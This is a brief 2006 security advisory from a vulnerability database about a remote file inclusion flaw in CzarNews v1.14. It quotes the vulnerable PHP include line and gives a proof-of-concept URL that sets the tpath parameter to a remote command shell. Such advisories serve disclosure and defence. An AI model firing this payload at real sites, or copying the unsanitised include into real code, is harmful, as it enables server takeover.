Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13118
HistoryJun 13, 2006 - 12:00 a.m.

CzarNews v1.14 Version - Remote File Include Vulnerabilities

2006-06-1300:00:00
vulners.com
38

SaVSaK.CoM | SpC-x - The-BeKiR |

CzarNews v1.14 Version - Remote File Include Vulnerabilities

Risk : High

Class: Remote

Script : CzarNews

Credits : SpC-x

Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke

Code :

if(file_exists($tpath . "cn_config.php"))

require_once($tpath . "cn_config.php");

Vulnerable :

http://www.victim.com/CzarNews/headlines.php?tpath=Command-Shell